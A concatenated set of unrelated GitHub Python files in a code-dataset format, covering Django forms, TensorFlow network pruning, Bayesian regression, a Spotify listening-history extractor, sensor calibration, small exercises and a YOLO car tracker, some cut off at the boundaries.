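# CartView above adds or removes an item depending on the is_add flag in the
# POST body. A hypothetical client-side call (URL, product id and token are
# placeholders, not values from this project):
import requests

resp = requests.post(
    "https://example.com/cart/",
    json={"product_id": 42, "is_add": True},
    headers={"Authorization": "Token <your-token>"},
)
print(resp.status_code, resp.json())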
data=response_data).create()","repo_name":"devraj4522/backend-greenie","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2900730812","text":"from django import forms\nfrom django.forms.widgets import ClearableFileInput\nfrom .models import Post, Category, Comment\n\n# Retrieve all category names and store them in a tuple\nchoices = Category.objects.all().values_list('name', 'name')\n\n# Create an empty list to store category choices\nchoices_list = []\n\n# Iterate through the choices and append each choice to the choices_list\nfor item in choices:\n choices_list.append(item)\n\n# Create a form for adding new posts, inheriting from forms.ModelForm\nclass PostForm(forms.ModelForm):\n # Include the category field with a ModelChoiceField\n category = forms.ModelChoiceField(queryset=Category.objects.all(), required=False)\n\n # Define the meta class for the PostForm\n class Meta:\n # Specify the model to use (Post)\n model = Post\n # Specify the fields to include in the form\n fields = ['title', 'header_image', 'content', 'category']\n\n # Define the widgets for each field\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder': \"this is the title\"}),\n 'header_image': ClearableFileInput(attrs={'class': 'form-control'}),\n 'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder': 'This is where you can post your content'}),\n 'category': forms.Select(choices=choices_list, attrs={'class': 'form-control'})\n }\n\n# Create a form for updating existing posts, inheriting from forms.ModelForm\nclass UpdateForm(forms.ModelForm):\n # Include the category field with a ModelChoiceField\n category = forms.ModelChoiceField(queryset=Category.objects.all(), required=False)\n\n # Define the meta class for the UpdateForm\n class Meta:\n # Specify the model to use (Post)\n model = Post\n # Specify the fields to include in the form\n fields = ['title', 'header_image', 'content', 'category']\n\n # Define the widgets for each field\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder': \"this is the title\"}),\n 'header_image': ClearableFileInput(attrs={'class': 'form-control'}),\n 'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder': 'This is where you can post your content'}),\n 'category': forms.Select(choices=choices_list, attrs={'class': 'form-control'})\n }\n\n# Create a form for adding comments, inheriting from forms.ModelForm\nclass CommentForm(forms.ModelForm):\n # Define the meta class for the CommentForm\n class Meta:\n # Specify the model to use (Comment)\n model = Comment\n # Specify the fields to include in the form\n fields = ['name', 'body']\n\n # Define the widgets for each field\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Your name'}),\n 'body': forms.Textarea(attrs={'placeholder': 'Leave a comment'}),\n }\n","repo_name":"dh646956164/Django_Blog","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73496027393","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport os\nimport cv2\nfrom datetime import datetime\n\nfrom model_only import fcn\nfrom 
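# In the forms module above, Category.objects.all().values_list('name', 'name')
# runs once at import time, so categories created later never appear until the
# process restarts. A common remedy, sketched under that assumption rather
# than taken from the original app, re-binds the queryset per form instance:
from django import forms
from .models import Category  # assumed import path, matching the module above

class PostFormFreshChoices(forms.Form):
    category = forms.ModelChoiceField(queryset=Category.objects.none(), required=False)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Re-evaluated on every instantiation, i.e. on every request.
        self.fields["category"].queryset = Category.objects.all()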
debug_functions import plot_weight_dist, print_inference\nfrom prune_network import prune_layers, check_pruned_weights, print_pruned_weights\nfrom tqdm import tqdm\n\nNUM_CLASS = 10\nMAX_STEPS = [30000, 30000, 30000, 30000, 30000, 30000]\nLOG_FREQUENCY = None\nBATCH_SIZE = 64\nLEARNING_RATE = 0.001\nMODEL_SAVING_FREQUENCY = None\nTRAIN_DIR = './checkpoints/train/'\nLOGS_DIR = './tensorboard/logs/'\nwhite_list = []# ['fcn/conv5/bias:0', 'fcn/norm5/gamma:0', 'fcn/norm5/beta:0']\nwhite_regex = []# ['bias', 'gamma', 'beta']\nskip_first = True # if True, will skip the first cycle of training and prune the network before training begins.\n\n# NOTE: python prune_train.py 2>&1 | tee logs.txt\n# python prune_train.py 2>>&1 | tee logs.txt <-- if you want to append to previous log file\n\ndef data_loader(dir):\n ldDict ={}\n with open(dir+'labels.txt', 'r') as f:\n lines = f.readlines()\n for cid, line in enumerate(lines):\n labelname=line.split('\\n')[0]\n ldDict[labelname] = cid\n trainSet= load_data(os.path.join(dir, 'train/'), ldDict)\n testSet = load_data(os.path.join(dir, 'test/'), ldDict)\n return trainSet, testSet, list(ldDict.keys())\n\n\ndef load_data(dirname, ldDict):\n data=[]\n labels=[]\n files = os.listdir(dirname)\n for filename in tqdm(files, desc=dirname):\n img = cv2.imread(dirname+filename)\n labelname = filename.split('.')[0].split('_')[1]\n cid = ldDict[labelname]\n data.append(img)\n labels.append(cid)\n dataSet = (np.asarray(data)/255.0).astype(np.float32)\n labels = np.asarray(labels)\n trainSet = {'data':dataSet,'labels':labels}\n return trainSet\n\n\ndef sample_batch(dataset, batch_size):\n N = dataset['data'].shape[0]\n indices = np.random.randint(N, size=batch_size)\n return {key: dataset[key][indices] for key in dataset}\n\n\ndef main():\n # grad mask dict placeholder\n grad_mask_consts = None\n\n # load data\n print(\"Loading datasets...\")\n trainSet, testSet, labelNames = data_loader('./dataset/cifar/')\n print(\"Dataset loading complete.\")\n\n # reset default graph\n tf.reset_default_graph()\n\n global_step = tf.train.get_or_create_global_step()\n\n # define optimizer\n opt = tf.train.GradientDescentOptimizer(\n learning_rate=LEARNING_RATE,\n # beta1=0.9,\n # beta2=0.999,\n # epsilon=1e-08,\n use_locking=False,\n name='GD'\n )\n\n images = tf.placeholder(name='images', dtype=tf.float32, shape=[None, 32, 32, 3])\n fine_labels = tf.placeholder(name='fine_labels', dtype=tf.int32, shape=[None])\n\n logits = fcn(images, is_training=True)\n # probs = tf.nn.softmax(logits)\n # pred = tf.cast(tf.argmax(logits, axis=1), tf.int32)\n\n # loss metrics:\n loss = tf.losses.softmax_cross_entropy(tf.one_hot(fine_labels, NUM_CLASS), logits)\n training_loss = tf.summary.scalar(\"training_loss\", loss)\n validation_loss = tf.summary.scalar(\"validation_loss\", loss)\n\n # accuracy metrics:\n top_1 = tf.cast(tf.equal(tf.cast(tf.argmax(logits, 1), tf.int32), fine_labels), tf.float32)\n accuracy = tf.reduce_mean(top_1)\n training_accuracy = tf.summary.scalar(\"training_accuracy\", accuracy)\n validation_accuracy = tf.summary.scalar(\"validation_accuracy\", accuracy)\n\n top_5 = tf.reduce_sum(tf.cast(tf.equal(tf.nn.top_k(logits, k=5, sorted=True)[1],\n tf.expand_dims(fine_labels, 1)), tf.float32), axis=1)\n top_5_accuracy = tf.reduce_mean(top_5)\n\n # init summary writer:\n writer = tf.summary.FileWriter(LOGS_DIR)\n\n step_ = 0\n for it in range(len(MAX_STEPS)):\n\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n if grad_mask_consts is not None:\n # Get all 
trainable parameters\n vars = tf.trainable_variables(scope='fcn')\n\n # Compute the gradients for a list of variables.\n train_grads = opt.compute_gradients(loss, vars)\n\n # Apply mask. orig_grads_and_vars is a list of tuples (gradient, variable).\n pruned_train_gradient = [\n (tf.multiply(tf.cast(grad_mask_consts[gv[1].name], tf.float32), gv[0]), gv[1]) for gv in train_grads]\n\n # Ask the optimizer to apply the masked gradients.\n train_op = opt.apply_gradients(pruned_train_gradient, global_step=global_step)\n else:\n train_op = opt.minimize(loss, global_step=global_step)\n\n # training setups\n saver = tf.train.Saver(max_to_keep=100)\n\n # Build an initialization operation to run below.\n init = tf.global_variables_initializer()\n\n # Start running operations on the Graph.\n sess = tf.Session(\n config=tf.ConfigProto(\n allow_soft_placement=True,\n )\n )\n sess.run(init)\n\n # try to load pre-trained models\n if tf.train.get_checkpoint_state(TRAIN_DIR) is not None:\n restorer = tf.train.Saver()\n restorer.restore(sess, tf.train.latest_checkpoint(TRAIN_DIR))\n print('%s: Pre-trained model restored from %s' %\n (datetime.now(), TRAIN_DIR))\n\n ################################################################################################################\n # Train the network\n if (it == 0 and not skip_first) or it > 0:\n # main loop\n for step in range(MAX_STEPS[it]):\n ############################################################################################################\n start_time = time.time()\n\n ############################################################################################################\n # training set\n # prepare data\n train_batch = sample_batch(trainSet, BATCH_SIZE)\n # feed dict\n feed_dict = {\n images: train_batch['data'],\n fine_labels: train_batch['labels'],\n }\n _, loss_value, train_loss, accuracy_value, train_acc, global_step_value = sess.run([train_op,\n loss, training_loss,\n accuracy, training_accuracy,\n global_step],\n feed_dict=feed_dict)\n writer.add_summary(train_acc, step_)\n writer.add_summary(train_loss, step_)\n\n ############################################################################################################\n # test set\n # prepare data\n test_batch = sample_batch(testSet, BATCH_SIZE)\n # feed dict\n feed_dict = {\n images: test_batch['data'],\n fine_labels: test_batch['labels'],\n }\n valid_accuracy_value, valid_acc, valid_loss_value, valid_loss = sess.run([accuracy, validation_accuracy,\n loss, validation_loss],\n feed_dict=feed_dict)\n writer.add_summary(valid_acc, step_)\n writer.add_summary(valid_loss, step_)\n\n duration = time.time() - start_time\n assert not np.isnan(loss_value), 'Model diverged with loss = NaN'\n ############################################################################################################\n\n # log\n if (LOG_FREQUENCY is not None and step % LOG_FREQUENCY == 0) or (step + 1) == MAX_STEPS[it]:\n num_examples_per_step = BATCH_SIZE\n examples_per_sec = num_examples_per_step / duration\n sec_per_batch = duration\n format_str = (\n '%s: step %d, examples %d, loss = %.9f accuracy = %.4f (%.3f examples/sec; %.3f sec/batch)'\n )\n print(\n format_str % (\n datetime.now(), step, BATCH_SIZE * step,\n loss_value,\n accuracy_value,\n examples_per_sec, sec_per_batch\n )\n )\n\n # Save the model checkpoint periodically\n if (MODEL_SAVING_FREQUENCY is not None and step % MODEL_SAVING_FREQUENCY == 0) or (step + 1) == MAX_STEPS[it]:\n checkpoint_path = os.path.join(TRAIN_DIR, 'model.ckpt')\n 
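# The masking above is what keeps pruned weights frozen: each gradient is
# multiplied elementwise by a 0/1 mask before apply_gradients, so masked
# entries receive no update. A self-contained toy version (TF1 graph mode
# assumed, as in this script):
import numpy as np
import tensorflow as tf

w = tf.get_variable("w_demo", initializer=np.ones(4, dtype=np.float32))
mask = tf.constant([1.0, 1.0, 0.0, 0.0])  # 0 marks a pruned weight
loss = tf.reduce_sum(tf.square(w))

opt = tf.train.GradientDescentOptimizer(0.1)
masked = [(g * mask, v) for g, v in opt.compute_gradients(loss, [w])]
train_op = opt.apply_gradients(masked)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(train_op)
    print(sess.run(w))  # [0.8, 0.8, 1.0, 1.0]: pruned weights do not move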
saver.save(sess, checkpoint_path, global_step=int(global_step_value))\n\n step_ += 1\n\n ################################################################################################################\n # Inference measurement:\n inf_accuracy, inf_top_5, inf_loss = print_inference(sess, testSet, images, fine_labels, accuracy, top_5_accuracy, loss, it)\n print('>>>\\tInference top_1 acc BEFORE pruning, it_{}: {}'.format(it, inf_accuracy))\n print('>>>\\tInference top_5 acc BEFORE pruning, it_{}: {}'.format(it, inf_top_5))\n\n ################################################################################################################\n # Pruning step:\n plot_weight_dist(sess, bins=200, title='Weight distribution before pruning, iteration {}'.format(it),\n fig_name='before_it{}'.format(it), verbose=False, zero_mask=it > 0)\n\n grad_mask_consts, global_step_value = prune_layers(sess, global_step, grad_mask_consts, white_list, white_regex)\n check_pruned_weights(sess, grad_mask_consts, it)\n print_pruned_weights(sess, grad_mask_consts)\n\n plot_weight_dist(sess, bins=200, grad_mask_consts=grad_mask_consts,\n title='Weight distribution after pruning, iteration {}'.format(it),\n fig_name='after_it{}'.format(it), verbose=False)\n\n ################################################################################################################\n # Inference measurement:\n inf_accuracy, inf_top_5, inf_loss = print_inference(sess, testSet, images, fine_labels, accuracy, top_5_accuracy, loss, it)\n print('>>>\\tInference top_1 acc AFTER pruning, it_{}: {}'.format(it, inf_accuracy))\n print('>>>\\tInference top_5 acc AFTER pruning, it_{}: {}'.format(it, inf_top_5))\n\n # Save the model checkpoint periodically\n checkpoint_path = os.path.join(TRAIN_DIR, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=int(global_step_value))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jzharris/ALPR-AIonChip","sub_path":"sandbox/YOLOv2/keras-yolo2/pruning/prune_train.py","file_name":"prune_train.py","file_ext":"py","file_size_in_byte":11351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6549005647","text":"import tensorflow as tf # for neural networks\nimport numpy as np # for numerical operations\nimport tensorflow_probability as tfp # for Bayesian neural networks\nfrom tensorflow_probability import distributions as tfd # for distributions\n\n__all__ = [\n \"probabilistic_variational_model\",\n \"compute_kl_divs\",\n \"black_box\"\n]\n\n\ndef neg_log_likelihood(x, rv_x):\n \"\"\"Negative log likelihood of the data under the distribution.\"\"\"\n return -rv_x.log_prob(x)\n\n\n# Specify the surrogate posterior over `keras.layers.Dense` `kernel` and `bias`.\ndef posterior_mean_field(kernel_size, bias_size=0, dtype=None):\n n = kernel_size + bias_size\n c = np.log(np.expm1(1.0))\n return tf.keras.Sequential(\n [\n tfp.layers.VariableLayer(\n 2 * n,\n dtype=dtype,\n initializer=lambda shape, dtype: random_gaussian_initializer(\n shape, dtype\n ),\n trainable=True,\n ),\n # tfp.layers.VariableLayer(2 * n, dtype=dtype),\n tfp.layers.DistributionLambda(\n lambda t: tfd.Independent(\n tfd.Normal(\n loc=t[..., :n],\n scale=1e-5 + 1e-2 * tf.nn.softplus(c + t[..., n:]),\n # softplus ensures positivity and avoids numerical instability\n ),\n reinterpreted_batch_ndims=1, # each weight is independent\n ) # reinterpreted_batch_ndims=1 means that the last dimension is the event dimension\n ),\n ]\n )\n\n\n# Specify the prior over 
`keras.layers.Dense` `kernel` and `bias`.\ndef prior_trainable(kernel_size, bias_size=0, dtype=None):\n n = kernel_size + bias_size\n return tf.keras.Sequential(\n [\n tfp.layers.VariableLayer(n, dtype=dtype),\n tfp.layers.DistributionLambda(\n lambda t: tfd.Independent(\n tfd.Normal(loc=t, scale=1), reinterpreted_batch_ndims=1\n )\n ),\n ]\n )\n\n\ndef random_gaussian_initializer(shape, dtype=\"float32\"):\n n = int(shape / 2)\n loc_norm = tf.random_normal_initializer(mean=0.0, stddev=0.1)\n loc = tf.Variable(initial_value=loc_norm(shape=(n,), dtype=dtype))\n scale_norm = tf.random_normal_initializer(mean=-3.0, stddev=0.1)\n scale = tf.Variable(initial_value=scale_norm(shape=(n,), dtype=dtype))\n return tf.concat([loc, scale], 0)\n\n\ndef probabilistic_variational_model(\n input_shape: tuple,\n output_shape: tuple,\n learn_r: float = 0.001,\n num_components: int = 1,\n):\n \"\"\"\n Probabilistic variational model for regression.\n :param input_shape: tuple, shape of the input data\n :param output_shape: tuple, shape of the output data\n :param learn_r: float, learning rate\n :param num_components: int, number of components in the mixture model\n :return: tf.keras.Sequential, probabilistic variational model\n \"\"\"\n params_size = tfp.layers.MixtureNormal.params_size(num_components, output_shape[-1]) # Number of parameters\n kl_weight = 1 / input_shape[0] # Weight for the KL divergence\n model = tf.keras.Sequential(\n [\n tf.keras.layers.InputLayer(input_shape=(input_shape[1], input_shape[2])), # Input layer\n tf.keras.layers.Conv1D(\n filters=4,\n kernel_size=2,\n padding=\"same\",\n kernel_initializer=tf.keras.initializers.Zeros(),\n ),\n tf.keras.layers.MaxPool1D(pool_size=2), # Pooling layer\n tf.keras.layers.Conv1D(\n filters=8,\n kernel_size=2,\n padding=\"same\",\n kernel_initializer=tf.keras.initializers.Zeros(),\n ),\n tf.keras.layers.MaxPool1D(pool_size=2), # Pooling layer\n tf.keras.layers.Flatten(),\n tfp.layers.DenseVariational(\n units=20,\n make_prior_fn=prior_trainable,\n make_posterior_fn=posterior_mean_field,\n kl_weight=kl_weight,\n kl_use_exact=True,\n name=\"var1\",\n activation=\"relu\",\n ), # Hidden layer 1\n tf.keras.layers.Dropout(0.3),\n tf.keras.layers.Dense(params_size), # Hidden layer 2\n tfp.layers.MixtureNormal(num_components, output_shape[-1]), # Mixture layer\n ],\n name=\"model\",\n )\n optimizer = tf.keras.optimizers.Adam(learning_rate=learn_r) # Optimizer\n model.compile(optimizer=optimizer, loss=neg_log_likelihood) # Compile model with loss and optimizer\n\n return model\n\n\n@tf.function\ndef compute_kl_divs(y_true, y_pred):\n ideal_dist = tfp.distributions.Normal(loc=y_true, scale=0.1)\n predicted_dist = tfp.distributions.Normal(loc=y_pred.mean(), scale=y_pred.stddev())\n return tfp.distributions.kl_divergence(ideal_dist, predicted_dist)\n\n\ndef black_box(X, y):\n # Let's now create a model.\n # You just need to specify the input and output shapes.\n model = probabilistic_variational_model(input_shape=X.shape,\n output_shape=y.shape,\n learn_r=0.001,)\n\n # Let's now train the model.\n # You can specify the number of epochs and the batch size.\n # define an early stopping callback\n early_stopping = tf.keras.callbacks.EarlyStopping(\n monitor=\"val_loss\",\n patience=10, # number of epochs with no improvement after which training will be stopped\n restore_best_weights=True, # restore the best model\n )\n\n # fit the model\n history = model.fit(\n X,\n y,\n epochs=500, # number of epochs - one epoch is one iteration over the entire training set\n 
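# (added note) with the EarlyStopping callback above (patience=10), training usually halts long before 500 epochs\n 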
batch_size=32, # batch size - number of samples per gradient update\n verbose=1, # verbose mode - 0: silent, 1: not silent\n validation_split=0.2, # validation split - 20% of the training data will be used for validation\n callbacks=[early_stopping], # early stopping - stop training when the validation loss is not decreasing\n # anymore\n )\n\n return model, history\n","repo_name":"robinthibaut/BASIL_Workshop_ILVO","sub_path":"basil/functions/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":6226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30276134447","text":"\"\"\"\n文件和异常\n实际开发中常常会遇到对数据进行持久化操作的场景,而实现数据持久化最直接简单的方式就是将数据保存到文件中\n\"\"\"\nimport time\n\n\"\"\"\n读取文本文件时,需要在使用open函数时指定好带路径的文件名(相对路径或绝对路径)并将文件模式设置为'r'\n然后通过encoding参数指定编码,如果不能保证保存文件时使用的编码方式与encoding参数指定的编码方式是一致的\n那么就可能因无法解码字符而导致读取失败\n\"\"\"\n\n\n# 当文件不存在时,捕获异常\ndef main():\n f = None\n try:\n f = open('/Day 17 - Files and Exceptions//Info.txt', 'r', encoding='utf-8')\n print(f.read())\n except FileNotFoundError:\n print('无法打开指定的文件!')\n except LookupError:\n print('指定了未知的编码!')\n except UnicodeDecodeError:\n print('读取文件时解码错误!')\n finally:\n if f:\n f.close()\n\n\nif __name__ == '__main__':\n main()\n print()\n\n\n\n\n","repo_name":"Bobby981229/Python-Learning","sub_path":"Day 17 - Files and Exceptions/Files_Exceptions.py","file_name":"Files_Exceptions.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44407288180","text":"#You are given an array coordinates, coordinates[i] = [x, y], where [x, y] represents the coordinate of a point. Check if these points make a straight line in the XY plane.\r\n#\r\n# \r\n#\r\n# \r\n#\r\n#Example 1:\r\n#\r\n#\r\n#\r\n#Input: coordinates = [[1,2],[2,3],[3,4],[4,5],[5,6],[6,7]]\r\n#Output: true\r\n#Example 2:\r\n#\r\n#\r\n#\r\n#Input: coordinates = [[1,1],[2,2],[3,4],[4,5],[5,6],[7,7]]\r\n#Output: false\r\n# \r\n#\r\n#Constraints:\r\n#\r\n#2 <= coordinates.length <= 1000\r\n#coordinates[i].length == 2\r\n#-10^4 <= coordinates[i][0], coordinates[i][1] <= 10^4\r\n#coordinates contains no duplicate point.\r\n\r\nclass Solution(object):\r\n def checkStraightLine(self, coordinates): \r\n if len(coordinates) < 3: \r\n return True\r\n\r\n x_diff = coordinates[1][0] - coordinates[0][0] \r\n y_diff = coordinates[1][1] - coordinates[0][1]\r\n\r\n for x, y in coordinates[2:]:\r\n dx = x - coordinates[0][0]\r\n dy = y - coordinates[0][1]\r\n if x_diff * dy != y_diff * dx:\r\n return False\r\n\r\n return True","repo_name":"nileshpaliwal/May-Leetcoding-Challenge-2020","sub_path":"Check If It Is a Straight Line.py","file_name":"Check If It Is a Straight Line.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26325576239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 27 10:30 2020\n\n@author: fdbfvuie\n\"\"\"\n\nn = int(input())\nfor i in range(n):\n a = [int(j) for j in input().split(\" \")]\n noPark = True\n \n for j in range(a[0] + 1, a[1], 1):\n if j % a[2] != 0:\n print(j, end=\" \")\n noPark = False\n\n if noPark:\n print(\"No free parking spaces.\", end = \"\")\n 
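# the bare print() below emits the newline that ends this test case's output\n 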
print()","repo_name":"fjfhfjfjgishbrk/AE401-Python","sub_path":"zerojudge/e621.py","file_name":"e621.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15695869136","text":"import datetime\nimport pandas as pd\nimport requests\n\nCOLUMNS = [\"song_name\", \"artist_name\", \"played_at\", \"time_stamp\"]\n\n\ndef get_headers(token: str) -> dict:\n return {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {token}\".format(token=token),\n }\n\n\ndef get_time_stamp(day: int = 1) -> int:\n start_date = datetime.datetime.now() - datetime.timedelta(days=day)\n return int(start_date.timestamp()) * 1000\n\n\ndef get_response(headers: dict, url: str, time_stamp: int) -> requests.Response:\n return requests.get(\n url=f\"{url}{time_stamp}\",\n headers=headers,\n )\n\n\ndef get_data_dict(res: requests.Response) -> dict:\n data = res.json()\n song_names = []\n artist_names = []\n played_at_list = []\n timestamps = []\n\n for song in data[\"items\"]:\n song_names.append(song[\"track\"][\"name\"])\n artist_names.append(song[\"track\"][\"album\"][\"artists\"][0][\"name\"])\n played_at_list.append(song[\"played_at\"])\n timestamps.append(song[\"played_at\"][0:10])\n\n return {\n \"song_name\": song_names,\n \"artist_name\": artist_names,\n \"played_at\": played_at_list,\n \"time_stamp\": timestamps,\n }\n\n\ndef extract(token: str, url: str) -> pd.DataFrame:\n headers = get_headers(token=token)\n\n time_stamp = get_time_stamp()\n\n res = get_response(headers=headers, url=url, time_stamp=time_stamp)\n\n song_dict = get_data_dict(res)\n\n return pd.DataFrame(song_dict, columns=COLUMNS)\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"pqtrng/spotify","sub_path":"app/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39940836512","text":"\"\"\" Infrared 3 Probability Sensor Model (PSM) Code for ENMT482 assignment - Part A. \"\"\"\n\n###################################################################################################\n\n\"\"\" Code setup. 
\"\"\"\n\n# Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import loadtxt, ones, zeros, linspace\nfrom numpy.linalg import lstsq\n\n###################################################################################################\n\ndef model_h_x(x, k):\n return k[0] + k[1]/ (x + k[2]) \n\ndef model_dh_x(x, k):\n return - k[1]/(x + k[2])**2\n\ndef model_nonlinear_least_squares_fit(x, z, iterations=5):\n \n N = len(z)\n A = ones((N, 3))\n k = zeros(3)\n \n for i in range(iterations):\n # Calculate Jacobians for current estimate of parameters.\n for n in range(N):\n A[n, 1] = 1 / (x[n] + k[2])\n A[n, 2] = -k[1] / (x[n] + k[2])**2\n \n # Use least squares to estimate the parameters.\n deltak, res, rank, s = lstsq(A, z - model_h_x(x, k))\n k += deltak\n\n return k\n\n\n###################################################################################################\n\ndef linear_ML_IR(k, z, x0, var_V):\n\n h_x = model_h_x(x0, k)\n dh_x = model_dh_x(x0, k)\n x_hat = (z - h_x) / dh_x + x0\n\n var_x_hat = var_V/(dh_x)**2\n return x_hat, var_x_hat\n\ndef mean(Z_meas, h_x):\n mean_V = sum(np.array(Z_meas) - np.array(h_x)) / len(h_x) \n return mean_V\n\ndef variance(mean_V, V_noise):\n var_IR3_array = []\n\n for val in V_noise:\n var_IR3_array.append((val - mean_V) ** 2)\n\n\n var_V = sum(var_IR3_array) / len(var_IR3_array)\n return var_V\n\ndef PDF(var_V, mean_V):\n \"\"\" Work out the PDF's (mean and variance). \"\"\"\n # Determine likelihoods.\n #print(\"{}:{}\\n\".format(mean_V,var_V))\n\n f_v_IR3 = []\n x_array = linspace(-5,5,400)\n for val in x_array:\n f_v_IR3.append((1 / (2 * np.pi * var_V)) * np.exp((-1/2) * ((val - mean_V) ** 2) / (var_V)))\n\n return f_v_IR3\n \n\ndef filter_outliers(V_vector):\n #using the Iglewics and Hoaglin's modified Z-score. This method requires a model for it to be performed.\n #The function requires the error vector and the median of the error.\n V_vector.sort()\n median = V_vector[(len(V_vector))/2]\n \n pass\n\n\ndef calibration():\n data = loadtxt('Part A/calibration.csv', delimiter=',', skiprows=1)\n index, time, range_, velocity_command, raw_ir1, raw_ir2, raw_ir3, raw_ir4, sonar1, sonar2 = data.T\n \n Z_meas = raw_ir3[1:758]\n X_state = range_[1:758]\n\n k = model_nonlinear_least_squares_fit(X_state, Z_meas)\n X_array = linspace(0.1,0.8,201)\n h_x = model_h_x(X_state, k)\n h_x_plot = model_h_x(X_array, k)\n\n V_noise = np.array(Z_meas) - np.transpose(np.array(h_x)) \n \n mean_V = mean(Z_meas, h_x)\n var_V = variance(mean_V, V_noise)\n f_v_IR3 = np.transpose(PDF(var_V, mean_V))\n print(var_V, mean_V)\n #for a given measurement z this function will determine where the ML estimate of the next point is, but\n #where do i get my initial guess from? 
is it from my other sensors?\n x0 = X_state[0]\n N = len(Z_meas)\n X_hat_array = []\n\n \n for n in range(N):\n z = Z_meas[n]\n var_z = V_noise[n]\n x_hat, var_x_hat = linear_ML_IR(k, z, x0, var_V)\n X_hat_array.append(x_hat)\n x0 = range_[n]\n\n z_array = linspace(3.0,0.2, 201)\n\n \n x_array = linspace(-5,5,400)\n\n plt.figure()\n plt.plot(x_array, f_v_IR3)\n plt.xlabel('Voltage')\n plt.ylabel('PDF')\n plt.title('IR3 PDF') \n\n plt.figure()\n plt.scatter(X_state, Z_meas, label='raw data', s=10, c='b', marker='o')\n plt.scatter(X_hat_array, Z_meas, label='taylor series approx', s=15, c='r', marker='o', alpha=0.2)\n plt.plot(X_array, h_x_plot, label='non-linear approx', markersize=10, color='k', linewidth=4)\n plt.legend()\n plt.ylabel('Voltage (V)')\n plt.xlabel('Distance (m)')\n plt.title('$k_1$ = %.3f, $k_2$ = %.3f, $k_3$ = %.3f' % (k[0], k[1], k[2]))\n plt.grid(True)\n\n plt.figure()\n plt.plot(time[1:758], range_[1:758], 'ko', alpha=0.2)\n plt.plot(time[1:758], X_hat_array, 'ro', alpha=0.2)\n plt.ylabel('Distance (m)')\n plt.xlabel('Time (s)')\n #plt.show()\n \n return var_V, k\n #savefig(__file__.replace('.py', '.pgf'), bbox_inches='tight')\n\n\n\ncalibration()","repo_name":"williamjohanson/Autonomous_Robotics","sub_path":"Part A/IR3_PSM.py","file_name":"IR3_PSM.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}\n+{"seq_id":"7845935292","text":"import cv2\nimport numpy as np\nimport time\nimport math\n\nclass EuclideanDistTracker:\n def __init__(self):\n # Store the center positions of the objects\n self.center_points = {}\n # Keep the count of the IDs\n # each time a new object id detected, the count will increase by one\n self.id_count = 1\n\n\n def update(self, objects_rect):\n # Objects boxes and ids\n objects_bbs_ids = []\n\n for rect in objects_rect:\n x, y, w, h, idd = rect\n cx = (x + x + w) // 2\n cy = (y + y + h) // 2\n \n same_object_detected = False\n for id, pt in self.center_points.items():\n dist = math.hypot(cx - pt[0], cy - pt[1])\n\n if dist < 30:\n self.center_points[id] = (cx, cy)\n #print(self.center_points)\n objects_bbs_ids.append([x, y, w, h, id])\n same_object_detected = True\n break\n if idd == 1:\n # New object is detected we assign the ID to that object\n if same_object_detected is False:\n self.center_points[self.id_count] = (cx, cy)\n objects_bbs_ids.append([x, y, w, h, self.id_count])\n self.id_count += 1\n\n new_center_points = {}\n for obj_bb_id in objects_bbs_ids:\n _, _, _, _, object_id = obj_bb_id\n center = self.center_points[object_id]\n new_center_points[object_id] = center\n\n # Update dictionary with IDs not used removed\n self.center_points = new_center_points.copy()\n return objects_bbs_ids\n\ntracker = EuclideanDistTracker()\nnet = cv2.dnn.readNet(\"yolov3.weights\", \"yolov3_testing.cfg\")\nclasses = [\"car\"]\nlayer_names = net.getLayerNames()\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\nfont = cv2.FONT_HERSHEY_PLAIN\ncap = cv2.VideoCapture(\"DRONE-SURVEILLANCE-CONTEST-VIDEO.mp4\")\nframe_id = 0\ntop_count = 0\nwriter = cv2.VideoWriter('Detected1_result.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 30, (1920,1080))\n\nwhile cap.isOpened():\n # Get frame; cap.read() returns (ok, frame), so stop cleanly when the stream runs out\n success, frame = cap.read()\n if not success:\n break\n frame_id += 1\n if frame_id % 1 != 0:\n continue\n \n height, width, channels = 